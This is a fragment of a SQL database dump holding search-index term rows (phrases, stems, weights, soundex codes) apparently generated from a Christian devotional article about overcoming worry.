(302057, 'difficult comes up', 'difficult comes up', 0, 1, 1.6, 'D12432521', 1, '*'),
(302058, 'discouraged and', 'discourag and', 0, 1, 1.5, 'D262353', 1, '*'),
(302059, 'discouraged and even', 'discourag and even', 0, 1, 1.6667, 'D26235315', 1, '*'),
(302060, 'discovered', 'discov', 0, 0, 0.6667, 'D2163', 1, '*'),
(302061, 'discovered that', 'discov that', 0, 1, 1.5, 'D2163', 1, '*'),
(302062, 'discovered that your', 'discov that your', 0, 1, 1.6667, 'D21636', 1, '*'),
(302063, 'discuss', 'discuss', 0, 0, 0.4667, 'D200', 1, '*'),
(302064, 'discuss the', 'discuss the', 0, 1, 1.3667, 'D230', 1, '*'),
(302065, 'discuss the matter', 'discuss the matter', 0, 1, 1.6, 'D23536', 1, '*'),
(302066, 'discussion over', 'discuss over', 0, 1, 1.5, 'D2516', 1, '*'),
(302067, 'discussion over the', 'discuss over the', 0, 1, 1.6333, 'D25163', 1, '*'),
(302068, 'do not worry', 'do not worry', 0, 1, 1.4, 'D536', 1, '*'),
(302069, 'does not fail', 'doe not fail', 0, 1, 1.4333, 'D25314', 1, '*'),
(302070, 'does not worry', 'doe not worry', 0, 1, 1.4667, 'D2536', 1, '*'),
(302071, 'doesn\'t mean', 'doesn mean', 0, 1, 1.4, 'D2535', 1, '*'),
(302072, 'doesn\'t mean you', 'doesn mean you', 0, 1, 1.5333, 'D2535', 1, '*'),
(302073, 'don\'t you', 'don you', 0, 1, 1.3, 'D530', 2, '*'),
(302074, 'don\'t you get', 'don you get', 0, 1, 1.4333, 'D5323', 1, '*'),
(302075, 'drink nor', 'drink nor', 0, 1, 1.3, 'D65256', 1, '*'),
(302076, 'drink nor about', 'drink nor about', 0, 1, 1.5, 'D6525613', 1, '*'),
(302077, 'eat or', 'eat or', 0, 1, 1.2, 'E360', 1, '*'),
(302078, 'eat or what', 'eat or what', 0, 1, 1.3667, 'E363', 1, '*'),
(302079, 'embedded', 'embed', 0, 0, 0.5333, 'E513', 1, '*'),
(302080, 'embedded in', 'embed in', 0, 1, 1.3667, 'E5135', 1, '*'),
(302081, 'embedded in your', 'embed in your', 0, 1, 1.5333, 'E51356', 1, '*'),
(302082, 'emotion', 'emot', 0, 0, 0.4667, 'E535', 1, '*'),
(302083, 'emotion and', 'emot and', 0, 1, 1.3667, 'E5353', 1, '*'),
(302084, 'emotion and negative', 'emot and negative', 0, 1, 1.6667, 'E53535231', 1, '*'),
(302085, 'emotion gets', 'emot gets', 0, 1, 1.4, 'E535232', 1, '*'),
(302086, 'emotion gets you', 'emot gets you', 0, 1, 1.5333, 'E535232', 1, '*'),
(302087, 'emotion that', 'emot that', 0, 1, 1.4, 'E5353', 1, '*'),
(302088, 'emotion that robs', 'emot that robs', 0, 1, 1.5667, 'E5353612', 1, '*'),
(302089, 'enlarges', 'enlarg', 0, 0, 0.5333, 'E5462', 1, '*'),
(302090, 'enlarges the', 'enlarg the', 0, 1, 1.4, 'E54623', 1, '*'),
(302091, 'enlarges the fact', 'enlarg the fact', 0, 1, 1.5667, 'E54623123', 1, '*'),
(302092, 'escape before', 'escap before', 0, 1, 1.4333, 'E216', 1, '*'),
(302093, 'escape before it', 'escap before it', 0, 1, 1.5333, 'E2163', 1, '*'),
(302094, 'even more sickly', 'even more sickly', 0, 1, 1.5333, 'E15624', 1, '*'),
(302095, 'fact that', 'fact that', 0, 1, 1.3, 'F230', 1, '*'),
(302096, 'fact that the', 'fact that the', 0, 1, 1.4333, 'F230', 1, '*'),
(302097, 'fade', 'fade', 0, 0, 0.2667, 'F300', 1, '*'),
(302098, 'fade out', 'fade out', 0, 1, 1.2667, 'F300', 1, '*'),
(302099, 'fade out so', 'fade out so', 0, 1, 1.3667, 'F320', 1, '*'),
(302100, 'fail sometimes', 'fail sometimes', 0, 1, 1.4667, 'F425352', 1, '*'),
(302101, 'fail sometimes i', 'fail sometimes i', 0, 1, 1.5333, 'F425352', 1, '*'),
(302102, 'faithless', 'faithless', 0, 0, 0.6, 'F342', 1, '*'),
(302103, 'faithless and', 'faithless and', 0, 1, 1.4333, 'F34253', 1, '*'),
(302104, 'faithless and discouraged', 'faithless and discouraged', 0, 1, 1.8333, 'F342532623', 1, '*'),
(302105, 'false sense', 'fals sense', 0, 1, 1.3667, 'F4252', 1, '*'),
(302106, 'false sense of', 'fals sense of', 0, 1, 1.4667, 'F42521', 1, '*'),
(302107, 'father feeds', 'father feeds', 0, 1, 1.4, 'F36132', 1, '*'),
(302108, 'father feeds them', 'father feeds them', 0, 1, 1.5667, 'F3613235', 1, '*'),
(302109, 'father\'s heart 23', 'father heart 23', 0, 1, 1.5667, 'F36263', 1, '*'),
(302110, 'fears', 'fear', 0, 0, 0.3333, 'F620', 1, '*'),
(302111, 'fears have', 'fear have', 0, 1, 1.3333, 'F621', 1, '*'),
(302112, 'fears have always', 'fear have always', 0, 1, 1.5667, 'F62142', 1, '*'),
(302113, 'feeds', 'feed', 0, 0, 0.3333, 'F320', 1, '*'),
(302114, 'feeds them', 'feed them', 0, 1, 1.3333, 'F3235', 1, '*'),
(302115, 'feeds them are', 'feed them are', 0, 1, 1.4667, 'F32356', 1, '*'),
(302116, 'fight to', 'fight to', 0, 1, 1.2667, 'F230', 1, '*'),
(302117, 'fight to escape', 'fight to escape', 0, 1, 1.5, 'F2321', 1, '*'),
(302118, 'find yourself worrying', 'find yourself worrying', 0, 1, 1.7333, 'F536241652', 1, '*'),
(302119, 'flow if', 'flow if', 0, 1, 1.2333, 'F410', 1, '*'),
(302120, 'flow if you', 'flow if you', 0, 1, 1.3667, 'F410', 1, '*'),
(302121, 'food and the', 'food and the', 0, 1, 1.4, 'F353', 1, '*'),
(302122, 'for they neither', 'for they neither', 0, 1, 1.5333, 'F63536', 1, '*'),
(302123, 'found out', 'found out', 0, 1, 1.3, 'F530', 1, '*'),
(302124, 'found out that', 'found out that', 0, 1, 1.4667, 'F530', 1, '*'),
(302125, 'from within my', 'from within my', 0, 1, 1.4667, 'F6535', 1, '*'),
(302126, 'gather into', 'gather into', 0, 1, 1.3667, 'G3653', 1, '*'),
(302127, 'gather into barns', 'gather into barns', 0, 1, 1.5667, 'G36531652', 1, '*'),
(302128, 'get a solution', 'get a solution', 0, 1, 1.4667, 'G32435', 1, '*'),
(302129, 'get into an', 'get into an', 0, 1, 1.3667, 'G3535', 1, '*'),
(302130, 'gets worse', 'get worse', 0, 1, 1.3333, 'G3262', 1, '*'),
(302131, 'gets worse when', 'get worse when', 0, 1, 1.5, 'G32625', 1, '*'),
(302132, 'gets you out', 'get you out', 0, 1, 1.4, 'G323', 1, '*'),
(302133, 'ghost inside', 'ghost inside', 0, 1, 1.4, 'G3523', 1, '*'),
(302134, 'ghost inside you', 'ghost inside you', 0, 1, 1.5333, 'G3523', 1, '*'),
(302135, 'ghost over', 'ghost over', 0, 1, 1.3333, 'G316', 1, '*'),
(302136, 'ghost over the', 'ghost over the', 0, 1, 1.4667, 'G3163', 1, '*'),
(302137, 'give the holy', 'give the holy', 0, 1, 1.4333, 'G134', 1, '*'),
(302138, 'gives a', 'give a', 0, 1, 1.2333, 'G120', 1, '*'),
(302139, 'gives a false', 'give a false', 0, 1, 1.4333, 'G12142', 1, '*'),
(302140, 'god by', 'god by', 0, 1, 1.2, 'G310', 1, '*'),
(302141, 'god by allowing', 'god by allowing', 0, 1, 1.5, 'G31452', 1, '*'),
(302142, 'god in on', 'god in on', 0, 1, 1.3, 'G350', 1, '*'),
(302143, 'god showed', 'god showed', 0, 1, 1.3333, 'G323', 1, '*'),
(302144, 'god showed me', 'god showed me', 0, 1, 1.4333, 'G3235', 1, '*'),
(302145, 'god\'s way', 'god way', 0, 1, 1.3, 'G320', 1, '*'),
(302146, 'god\'s way of', 'god way of', 0, 1, 1.4, 'G321', 1, '*'),
(302147, 'happened', 'happen', 0, 0, 0.5333, 'H153', 1, '*'),
(302148, 'happened in', 'happen in', 0, 1, 1.3667, 'H1535', 1, '*'),
(302149, 'happened in matters', 'happen in matters', 0, 1, 1.6333, 'H1535362', 1, '*'),
(302150, 'has made you', 'ha made you', 0, 1, 1.4, 'H253', 1, '*'),
(302151, 'has never solved', 'ha never solved', 0, 1, 1.5333, 'H25162413', 1, '*'),
(302152, 'have always happened', 'have always happened', 0, 1, 1.6667, 'H142153', 1, '*'),
(302153, 'have been so', 'have been so', 0, 1, 1.4, 'H152', 1, '*'),
(302154, 'have you not', 'have you not', 0, 1, 1.4, 'H153', 1, '*'),
(302155, 'heart 23', 'heart 23', 0, 1, 1.2667, 'H630', 1, '*'),
(302156, 'heart 23 04', 'heart 23 04', 0, 1, 1.3667, 'H630', 1, '*'),
(302157, 'heavenly father', 'heavenli father', 0, 1, 1.5, 'H154136', 1, '*'),
(302158, 'heavenly father feeds', 'heavenli father feeds', 0, 1, 1.7, 'H154136132', 1, '*'),
(302159, 'help you let', 'help you let', 0, 1, 1.4, 'H4143', 1, '*'),
(302160, 'his stature', 'hi stature', 0, 1, 1.3667, 'H236', 1, '*');
INSERT INTO `y57u5_finder_terms` (`term_id`, `term`, `stem`, `common`, `phrase`, `weight`, `soundex`, `links`, `language`) VALUES
(302161, 'his stature one', 'hi stature one', 0, 1, 1.5, 'H2365', 1, '*'),
(302162, 'holy ghost inside', 'holi ghost inside', 0, 1, 1.5667, 'H423523', 1, '*'),
(302163, 'holy ghost over', 'holi ghost over', 0, 1, 1.5, 'H42316', 1, '*'),
(302164, 'holy spirit can', 'holi spirit can', 0, 1, 1.5, 'H4216325', 1, '*'),
(302165, 'human spirit', 'human spirit', 0, 1, 1.4, 'H52163', 1, '*'),
(302166, 'human spirit to', 'human spirit to', 0, 1, 1.5, 'H52163', 1, '*'),
(302167, 'i call', 'i call', 0, 1, 1.2, 'I240', 1, '*'),
(302168, 'i call my', 'i call my', 0, 1, 1.3, 'I245', 1, '*'),
(302169, 'i pray in', 'i pray in', 0, 1, 1.3, 'I165', 1, '*'),
(302170, 'i refuse', 'i refuse', 0, 1, 1.2667, 'I612', 1, '*'),
(302171, 'i refuse to', 'i refuse to', 0, 1, 1.3667, 'I6123', 1, '*'),
(302172, 'i say', 'i say', 0, 1, 1.1667, 'I200', 1, '*'),
(302173, 'i say to', 'i say to', 0, 1, 1.2667, 'I230', 1, '*'),
(302174, 'i so', 'i so', 0, 1, 1.1333, 'I200', 1, '*'),
(302175, 'i so much', 'i so much', 0, 1, 1.3, 'I252', 1, '*'),
(302176, 'i used', 'i used', 0, 1, 1.2, 'I230', 1, '*'),
(302177, 'i used to', 'i used to', 0, 1, 1.3, 'I230', 1, '*'),
(302178, 'i\'m around', 'i around', 0, 1, 1.3333, 'I5653', 1, '*'),
(302179, 'i\'m around she', 'i around she', 0, 1, 1.4667, 'I56532', 1, '*'),
(302180, 'if you find', 'if you find', 0, 1, 1.3667, 'I153', 1, '*'),
(302181, 'impossibility', 'imposs', 0, 0, 0.8667, 'I512143', 1, '*'),
(302182, 'impossibility so', 'imposs so', 0, 1, 1.5333, 'I5121432', 1, '*'),
(302183, 'impossibility so fight', 'imposs so fight', 0, 1, 1.7333, 'I5121432123', 1, '*'),
(302184, 'impossible to', 'imposs to', 0, 1, 1.4333, 'I512143', 1, '*'),
(302185, 'impossible to be', 'imposs to be', 0, 1, 1.5333, 'I5121431', 1, '*'),
(302186, 'in matters', 'in matters', 0, 1, 1.3333, 'I5362', 1, '*'),
(302187, 'in matters that', 'in matters that', 0, 1, 1.5, 'I53623', 1, '*'),
(302188, 'in on', 'in on', 0, 1, 1.1667, 'I500', 1, '*'),
(302189, 'in on the', 'in on the', 0, 1, 1.3, 'I530', 1, '*'),
(302190, 'in your body', 'in your body', 0, 1, 1.4, 'I5613', 1, '*'),
(302191, 'in your regenerated', 'in your regenerated', 0, 1, 1.6333, 'I562563', 1, '*'),
(302192, 'inside you to', 'insid you to', 0, 1, 1.4333, 'I523', 1, '*'),
(302193, 'inspiration worry', 'inspir worry', 0, 1, 1.5667, 'I5216356', 1, '*'),
(302194, 'inspiration worry and', 'inspir worry and', 0, 1, 1.7, 'I521635653', 1, '*'),
(302195, 'instead of worrying', 'instead of worrying', 0, 1, 1.6333, 'I5231652', 1, '*'),
(302196, 'into a corner', 'into a corner', 0, 1, 1.4333, 'I532656', 1, '*'),
(302197, 'into an', 'into an', 0, 1, 1.2333, 'I535', 1, '*'),
(302198, 'into an anointed', 'into an anointed', 0, 1, 1.5333, 'I5353', 1, '*'),
(302199, 'into barns', 'into barns', 0, 1, 1.3333, 'I531652', 1, '*'),
(302200, 'into barns yet', 'into barns yet', 0, 1, 1.4667, 'I5316523', 1, '*'),
(302201, 'irresponsible', 'irrespons', 0, 0, 0.8667, 'I6215214', 1, '*'),
(302202, 'irresponsible or', 'irrespons or', 0, 1, 1.5333, 'I62152146', 1, '*'),
(302203, 'irresponsible or carefree', 'irrespons or carefree', 0, 1, 1.8333, 'I621521462616', 1, '*'),
(302204, 'is a negative', 'is a negative', 0, 1, 1.4333, 'I25231', 1, '*'),
(302205, 'is asatanic', 'is asatanic', 0, 1, 1.3667, 'I2352', 1, '*'),
(302206, 'is asatanic trap', 'is asatanic trap', 0, 1, 1.5333, 'I2352361', 1, '*'),
(302207, 'is i', 'is i', 0, 1, 1.1333, 'I200', 1, '*'),
(302208, 'is i used', 'is i used', 0, 1, 1.3, 'I230', 1, '*'),
(302209, 'is impossible to', 'is impossible to', 0, 1, 1.5333, 'I2512143', 1, '*'),
(302210, 'is not god\'s', 'is not god', 0, 1, 1.4, 'I253232', 1, '*'),
(302211, 'is not life', 'is not life', 0, 1, 1.3667, 'I25341', 1, '*'),
(302212, 'is that she', 'is that she', 0, 1, 1.3667, 'I232', 1, '*'),
(302213, 'issues worry', 'issu worry', 0, 1, 1.4, 'I260', 1, '*'),
(302214, 'issues worry is', 'issu worry is', 0, 1, 1.5, 'I262', 1, '*'),
(302215, 'it and answers', 'it and answers', 0, 1, 1.4667, 'I3535262', 1, '*'),
(302216, 'it does', 'it does', 0, 1, 1.2333, 'I320', 1, '*'),
(302217, 'it does not', 'it does not', 0, 1, 1.3667, 'I3253', 1, '*'),
(302218, 'it has made', 'it has made', 0, 1, 1.3667, 'I3253', 1, '*'),
(302219, 'it is asatanic', 'it is asatanic', 0, 1, 1.4667, 'I32352', 1, '*'),
(302220, 'it means you', 'it means you', 0, 1, 1.4, 'I352', 1, '*'),
(302221, 'it over', 'it over', 0, 1, 1.2333, 'I316', 1, '*'),
(302222, 'it over to', 'it over to', 0, 1, 1.3333, 'I3163', 1, '*'),
(302223, 'it till', 'it till', 0, 1, 1.2333, 'I340', 1, '*'),
(302224, 'it till next', 'it till next', 0, 1, 1.4, 'I34523', 1, '*'),
(302225, 'item 44', 'item 44', 0, 1, 1.2333, 'I350', 1, '*'),
(302226, 'item 44 from', 'item 44 from', 0, 1, 1.4, 'I35165', 1, '*'),
(302227, 'its creativity', 'it creativity', 0, 1, 1.4667, 'I326313', 1, '*'),
(302228, 'its creativity and', 'it creativity and', 0, 1, 1.6, 'I32631353', 1, '*'),
(302229, 'k2 item 44', 'k2 item 44', 0, 1, 1.3333, 'K350', 1, '*'),
(302230, 'late have', 'late have', 0, 1, 1.3, 'L310', 1, '*'),
(302231, 'late have you', 'late have you', 0, 1, 1.4333, 'L310', 1, '*'),
(302232, 'let god in', 'let god in', 0, 1, 1.3333, 'L3235', 1, '*'),
(302233, 'let worry', 'let worry', 0, 1, 1.3, 'L360', 1, '*'),
(302234, 'let worry fade', 'let worry fade', 0, 1, 1.4667, 'L3613', 1, '*'),
(302235, 'life more', 'life more', 0, 1, 1.3, 'L156', 1, '*'),
(302236, 'life more than', 'life more than', 0, 1, 1.4667, 'L15635', 1, '*'),
(302237, 'life what you', 'life what you', 0, 1, 1.4333, 'L130', 1, '*'),
(302238, 'lose the creativity', 'lose the creativity', 0, 1, 1.6333, 'L2326313', 1, '*'),
(302239, 'lot until', 'lot until', 0, 1, 1.3, 'L3534', 1, '*'),
(302240, 'lot until god', 'lot until god', 0, 1, 1.4333, 'L353423', 1, '*'),
(302241, 'love about', 'love about', 0, 1, 1.3333, 'L130', 1, '*'),
(302242, 'love about my', 'love about my', 0, 1, 1.4333, 'L135', 1, '*'),
(302243, 'made you more', 'made you more', 0, 1, 1.4333, 'M356', 1, '*'),
(302244, 'magnifies', 'magnifi', 0, 0, 0.6, 'M2512', 1, '*'),
(302245, 'magnifies the', 'magnifi the', 0, 1, 1.4333, 'M25123', 1, '*'),
(302246, 'magnifies the problems', 'magnifi the problems', 0, 1, 1.7333, 'M25123161452', 1, '*'),
(302247, 'make you creative', 'make you creative', 0, 1, 1.5667, 'M2631', 1, '*'),
(302248, 'many issues', 'mani issues', 0, 1, 1.3667, 'M200', 1, '*'),
(302249, 'many issues worry', 'mani issues worry', 0, 1, 1.5667, 'M260', 1, '*'),
(302250, 'matter and', 'matter and', 0, 1, 1.3333, 'M3653', 1, '*'),
(302251, 'matter and answers', 'matter and answers', 0, 1, 1.6, 'M36535262', 1, '*'),
(302252, 'matter give', 'matter give', 0, 1, 1.3667, 'M3621', 1, '*'),
(302253, 'matter give the', 'matter give the', 0, 1, 1.5, 'M36213', 1, '*'),
(302254, 'matter please', 'matter please', 0, 1, 1.4333, 'M36142', 1, '*'),
(302255, 'matter please note', 'matter please note', 0, 1, 1.6, 'M3614253', 1, '*'),
(302256, 'matter that', 'matter that', 0, 1, 1.3667, 'M363', 1, '*'),
(302257, 'matter that seems', 'matter that seems', 0, 1, 1.5667, 'M363252', 1, '*'),
(302258, 'matter whenever', 'matter whenever', 0, 1, 1.5, 'M36516', 1, '*'),
(302259, 'matter whenever a', 'matter whenever a', 0, 1, 1.5667, 'M36516', 1, '*'),
(302260, 'matter with', 'matter with', 0, 1, 1.3667, 'M363', 1, '*'),
(302261, 'matter with the', 'matter with the', 0, 1, 1.5, 'M363', 1, '*'),
(302262, 'matter you', 'matter you', 0, 1, 1.3333, 'M360', 1, '*'),
(302263, 'matter you lose', 'matter you lose', 0, 1, 1.5, 'M3642', 1, '*'),
(302264, 'matters no', 'matter no', 0, 1, 1.3333, 'M3625', 1, '*'),
(302265, 'matters no it', 'matter no it', 0, 1, 1.4333, 'M36253', 1, '*'),
(302266, 'matters that', 'matter that', 0, 1, 1.4, 'M3623', 1, '*'),
(302267, 'matters that you', 'matter that you', 0, 1, 1.5333, 'M3623', 1, '*'),
(302268, 'matters worry', 'matter worry', 0, 1, 1.4333, 'M3626', 1, '*'),
(302269, 'matters worry magnifies', 'matter worry magnifies', 0, 1, 1.7667, 'M362652512', 1, '*'),
(302270, 'matthew 6', 'matthew 6', 0, 1, 1.3, 'M300', 1, '*'),
(302271, 'matthew 6 25', 'matthew 6 25', 0, 1, 1.4, 'M300', 1, '*'),
(302272, 'me this', 'me this', 0, 1, 1.2333, 'M320', 2, '*'),
(302273, 'me this scripture', 'me this scripture', 0, 1, 1.5667, 'M326136', 1, '*'),
(302274, 'mean you', 'mean you', 0, 1, 1.2667, 'M000', 1, '*'),
(302275, 'mean you are', 'mean you are', 0, 1, 1.4, 'M600', 1, '*'),
(302276, 'mean you become', 'mean you become', 0, 1, 1.5, 'M125', 1, '*'),
(302277, 'means you are', 'mean you are', 0, 1, 1.4333, 'M260', 1, '*'),
(302278, 'mind of', 'mind of', 0, 1, 1.2333, 'M310', 1, '*'),
(302279, 'mind of its', 'mind of its', 0, 1, 1.3667, 'M3132', 1, '*'),
(302280, 'mind to the', 'mind to the', 0, 1, 1.3667, 'M300', 1, '*'),
(302281, 'more faithless', 'more faithless', 0, 1, 1.4667, 'M61342', 1, '*'),
(302282, 'more faithless and', 'more faithless and', 0, 1, 1.6, 'M6134253', 1, '*'),
(302283, 'more sickly', 'more sickly', 0, 1, 1.3667, 'M624', 1, '*'),
(302284, 'more sickly in', 'more sickly in', 0, 1, 1.4667, 'M6245', 1, '*'),
(302285, 'more than clothing', 'more than clothing', 0, 1, 1.6, 'M63524352', 1, '*'),
(302286, 'more than food', 'more than food', 0, 1, 1.4667, 'M63513', 1, '*'),
(302287, 'more value', 'more value', 0, 1, 1.3333, 'M614', 1, '*'),
(302288, 'more value than', 'more value than', 0, 1, 1.5, 'M61435', 1, '*'),
(302289, 'mrs areogun', 'mr areogun', 0, 1, 1.3667, 'M62625', 1, '*'),
(302290, 'mrs areogun is', 'mr areogun is', 0, 1, 1.4667, 'M626252', 1, '*'),
(302291, 'much love', 'much love', 0, 1, 1.3, 'M241', 1, '*'),
(302292, 'much love about', 'much love about', 0, 1, 1.5, 'M2413', 1, '*'),
(302293, 'my spirit', 'my spirit', 0, 1, 1.3, 'M2163', 2, '*'),
(302294, 'my spirit it', 'my spirit it', 0, 1, 1.4, 'M2163', 1, '*'),
(302295, 'my wife', 'my wife', 0, 1, 1.2333, 'M100', 1, '*'),
(302296, 'my wife rev', 'my wife rev', 0, 1, 1.3667, 'M161', 1, '*'),
(302297, 'my wife we', 'my wife we', 0, 1, 1.3333, 'M100', 1, '*'),
(302298, 'negative emotion', 'neg emotion', 0, 1, 1.5333, 'N231535', 1, '*'),
(302299, 'negative emotion and', 'neg emotion and', 0, 1, 1.6667, 'N2315353', 1, '*'),
(302300, 'negative emotion gets', 'neg emotion gets', 0, 1, 1.7, 'N231535232', 1, '*'),
(302301, 'negative emotion that', 'neg emotion that', 0, 1, 1.7, 'N2315353', 1, '*'),
(302302, 'neither sow', 'neither sow', 0, 1, 1.3667, 'N362', 1, '*'),
(302303, 'neither sow nor', 'neither sow nor', 0, 1, 1.5, 'N36256', 1, '*'),
(302304, 'never solved', 'never solved', 0, 1, 1.4, 'N162413', 1, '*'),
(302305, 'never solved any', 'never solved any', 0, 1, 1.5333, 'N1624135', 1, '*'),
(302306, 'no it', 'no it', 0, 1, 1.1667, 'N300', 1, '*'),
(302307, 'no it means', 'no it means', 0, 1, 1.3667, 'N352', 1, '*'),
(302308, 'no worrying', 'no worrying', 0, 1, 1.3667, 'N652', 1, '*'),
(302309, 'no worrying doesn\'t', 'no worrying doesn', 0, 1, 1.6333, 'N6523253', 1, '*'),
(302310, 'nor about', 'nor about', 0, 1, 1.3, 'N613', 1, '*'),
(302311, 'nor about your', 'nor about your', 0, 1, 1.4667, 'N6136', 1, '*'),
(302312, 'nor gather', 'nor gather', 0, 1, 1.3333, 'N6236', 1, '*'),
(302313, 'nor gather into', 'nor gather into', 0, 1, 1.5, 'N623653', 1, '*'),
(302314, 'nor reap', 'nor reap', 0, 1, 1.2667, 'N610', 1, '*'),
(302315, 'nor reap nor', 'nor reap nor', 0, 1, 1.4, 'N6156', 1, '*'),
(302316, 'not discovered', 'not discovered', 0, 1, 1.4667, 'N32163', 1, '*'),
(302317, 'not discovered that', 'not discovered that', 0, 1, 1.6333, 'N32163', 1, '*'),
(302318, 'not fail sometimes', 'not fail sometimes', 0, 1, 1.6, 'N31425352', 1, '*'),
(302319, 'not found', 'not found', 0, 1, 1.3, 'N3153', 1, '*'),
(302320, 'not found out', 'not found out', 0, 1, 1.4333, 'N3153', 1, '*'),
(302321, 'not god\'s', 'not god', 0, 1, 1.3, 'N3232', 1, '*'),
(302322, 'not god\'s way', 'not god way', 0, 1, 1.4333, 'N3232', 1, '*'),
(302323, 'not life', 'not life', 0, 1, 1.2667, 'N341', 1, '*'),
(302324, 'not life more', 'not life more', 0, 1, 1.4333, 'N34156', 1, '*'),
(302325, 'not of', 'not of', 0, 1, 1.2, 'N310', 1, '*'),
(302326, 'not of more', 'not of more', 0, 1, 1.3667, 'N3156', 1, '*'),
(302327, 'not worry', 'not worry', 0, 1, 1.3, 'N360', 1, '*'),
(302328, 'not worry about', 'not worry about', 0, 1, 1.5, 'N3613', 1, '*'),
(302329, 'not worry beloved', 'not worry beloved', 0, 1, 1.5667, 'N361413', 1, '*'),
(302330, 'note that the', 'note that the', 0, 1, 1.4333, 'N300', 1, '*'),
(302331, 'of creativity', 'of creativity', 0, 1, 1.4333, 'O126313', 1, '*'),
(302332, 'of creativity and', 'of creativity and', 0, 1, 1.5667, 'O12631353', 1, '*'),
(302333, 'of impossibility', 'of impossibility', 0, 1, 1.5333, 'O1512143', 1, '*'),
(302334, 'of impossibility so', 'of impossibility so', 0, 1, 1.6333, 'O15121432', 1, '*'),
(302335, 'of its', 'of its', 0, 1, 1.2, 'O132', 1, '*'),
(302336, 'of its creativity', 'of its creativity', 0, 1, 1.5667, 'O1326313', 1, '*'),
(302337, 'of more', 'of more', 0, 1, 1.2333, 'O156', 1, '*'),
(302338, 'of more value', 'of more value', 0, 1, 1.4333, 'O15614', 1, '*'),
(302339, 'of responsibility', 'of responsibility', 0, 1, 1.5667, 'O162152143', 1, '*'),
(302340, 'of responsibility open', 'of responsibility open', 0, 1, 1.7333, 'O16215214315', 1, '*'),
(302341, 'of solving', 'of solving', 0, 1, 1.3333, 'O124152', 1, '*'),
(302342, 'of solving your', 'of solving your', 0, 1, 1.5, 'O1241526', 1, '*'),
(302343, 'of the air', 'of the air', 0, 1, 1.3333, 'O136', 1, '*'),
(302344, 'of the zone', 'of the zone', 0, 1, 1.3667, 'O1325', 1, '*'),
(302345, 'of worrying', 'of worrying', 0, 1, 1.3667, 'O1652', 1, '*'),
(302346, 'of worrying why', 'of worrying why', 0, 1, 1.5, 'O1652', 1, '*'),
(302347, 'of you by', 'of you by', 0, 1, 1.3, 'O100', 1, '*'),
(302348, 'on is', 'on is', 0, 1, 1.1667, 'O520', 1, '*'),
(302349, 'on is not', 'on is not', 0, 1, 1.3, 'O5253', 1, '*'),
(302350, 'on it till', 'on it till', 0, 1, 1.3333, 'O534', 1, '*'),
(302351, 'on the matter', 'on the matter', 0, 1, 1.4333, 'O53536', 1, '*'),
(302352, 'once i\'m', 'onc i', 0, 1, 1.2667, 'O525', 1, '*'),
(302353, 'once i\'m around', 'onc i around', 0, 1, 1.5, 'O525653', 1, '*'),
(302354, 'one cubit', 'on cubit', 0, 1, 1.3, 'O5213', 1, '*'),
(302355, 'one cubit to', 'on cubit to', 0, 1, 1.4, 'O5213', 1, '*'),
(302356, 'one thing i', 'on thing i', 0, 1, 1.3667, 'O5352', 1, '*'),
(302357, 'only gets', 'onli gets', 0, 1, 1.3, 'O54232', 1, '*'),
(302358, 'only gets worse', 'onli gets worse', 0, 1, 1.5, 'O5423262', 1, '*'),
(302359, 'open your', 'open your', 0, 1, 1.3, 'O156', 1, '*'),
(302360, 'open your mind', 'open your mind', 0, 1, 1.4667, 'O15653', 1, '*'),
(302361, 'or bringing', 'or bringing', 0, 1, 1.3667, 'O6165252', 1, '*'),
(302362, 'or bringing solutions', 'or bringing solutions', 0, 1, 1.7, 'O61652524352', 1, '*'),
(302363, 'or carefree', 'or carefree', 0, 1, 1.3667, 'O62616', 1, '*'),
(302364, 'or carefree about', 'or carefree about', 0, 1, 1.5667, 'O6261613', 1, '*'),
(302365, 'or start', 'or start', 0, 1, 1.2667, 'O62363', 1, '*'),
(302366, 'or start praying', 'or start praying', 0, 1, 1.5333, 'O623631652', 1, '*'),
(302367, 'or what', 'or what', 0, 1, 1.2333, 'O630', 1, '*'),
(302368, 'or what you', 'or what you', 0, 1, 1.3667, 'O630', 1, '*'),
(302369, 'out so', 'out so', 0, 1, 1.2, 'O320', 1, '*'),
(302370, 'out so that', 'out so that', 0, 1, 1.3667, 'O323', 1, '*'),
(302371, 'out that', 'out that', 0, 1, 1.2667, 'O300', 1, '*'),
(302372, 'out that negative', 'out that negative', 0, 1, 1.5667, 'O35231', 1, '*'),
(302373, 'out that your', 'out that your', 0, 1, 1.4333, 'O360', 1, '*'),
(302374, 'over a', 'over a', 0, 1, 1.2, 'O160', 1, '*'),
(302375, 'over a matter', 'over a matter', 0, 1, 1.4333, 'O16536', 1, '*'),
(302376, 'over it and', 'over it and', 0, 1, 1.3667, 'O16353', 1, '*'),
(302377, 'over the matter', 'over the matter', 0, 1, 1.5, 'O163536', 1, '*'),
(302378, 'over to', 'over to', 0, 1, 1.2333, 'O163', 1, '*'),
(302379, 'over to god', 'over to god', 0, 1, 1.3667, 'O16323', 1, '*'),
(302380, 'please note', 'pleas note', 0, 1, 1.3667, 'P4253', 1, '*'),
(302381, 'please note that', 'pleas note that', 0, 1, 1.5333, 'P4253', 1, '*'),
(302382, 'problem is impossible', 'problem is impossible', 0, 1, 1.7, 'P6145251214', 1, '*'),
(302383, 'problem rather', 'problem rather', 0, 1, 1.4667, 'P6145636', 1, '*'),
(302384, 'problem rather it', 'problem rather it', 0, 1, 1.5667, 'P61456363', 1, '*'),
(302385, 'problems and', 'problem and', 0, 1, 1.4, 'P6145253', 2, '*'),
(302386, 'problems and also', 'problem and also', 0, 1, 1.5667, 'P614525342', 1, '*'),
(302387, 'problems i', 'problem i', 0, 1, 1.3333, 'P61452', 1, '*'),
(302388, 'problems i used', 'problem i used', 0, 1, 1.5, 'P614523', 1, '*'),
(302389, 'problems or bringing', 'problem or bringing', 0, 1, 1.6667, 'P614526165252', 1, '*'),
(302390, 'put on', 'put on', 0, 1, 1.2, 'P350', 2, '*'),
(302391, 'put on is', 'put on is', 0, 1, 1.3, 'P352', 1, '*'),
(302392, 'quit', 'quit', 0, 0, 0.2667, 'Q300', 1, '*'),
(302393, 'quit worrying', 'quit worrying', 0, 1, 1.4333, 'Q3652', 1, '*'),
(302394, 'quit worrying it', 'quit worrying it', 0, 1, 1.5333, 'Q36523', 1, '*'),
(302395, 'quit worrying stop', 'quit worrying stop', 0, 1, 1.6, 'Q365231', 1, '*'),
(302396, 'rather it', 'rather it', 0, 1, 1.3, 'R363', 1, '*'),
(302397, 'rather it has', 'rather it has', 0, 1, 1.4333, 'R3632', 1, '*'),
(302398, 'reap', 'reap', 0, 0, 0.2667, 'R100', 1, '*'),
